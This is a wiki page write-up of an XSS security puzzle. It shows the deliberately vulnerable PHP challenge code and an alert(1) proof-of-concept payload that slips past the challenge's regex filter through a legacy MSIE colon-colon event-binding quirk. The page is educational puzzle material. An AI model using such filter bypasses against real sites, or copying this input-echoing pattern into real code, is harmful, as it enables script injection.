Skip to content
This repository has been archived by the owner on Jul 4, 2023. It is now read-only.

Puzzle 2 on kcal.pw

Jump to bottom
cure53 edited this page Sep 17, 2014 · 1 revision

kcal.pw Puzzle 2

XSS Puzzle published by @filedescriptor in August 2014: http://kcal.pw/puzzle2.php

Code

<meta charset="utf-8">
<p>alert(1) in this origin</p>
<p><a href="?xss=XSS">give it a try</a></p>
<script>
if (0) {
    <?php echo preg_replace('/}[\w\W]*{|</', '_', $_GET['xss']); ?>

}
</script>
<!--
<?php readfile(__FILE__); ?>

Solution

The solution is based on abusing an ES3 feature that never made it into the standard but got prematurely implemented in MSIE: The colon-colon operator.

PoC

function self::onload(){alert(1)}

What happens here is the following: MSIE allows to bind events to elements using the colon-colon operator. This code construct bypasses the strict filter regex the challenge is using and thereby introduces event handling inside the if(0) block. A load-event is being used on self, having the same effect as a window.onload.

Clone this wiki locally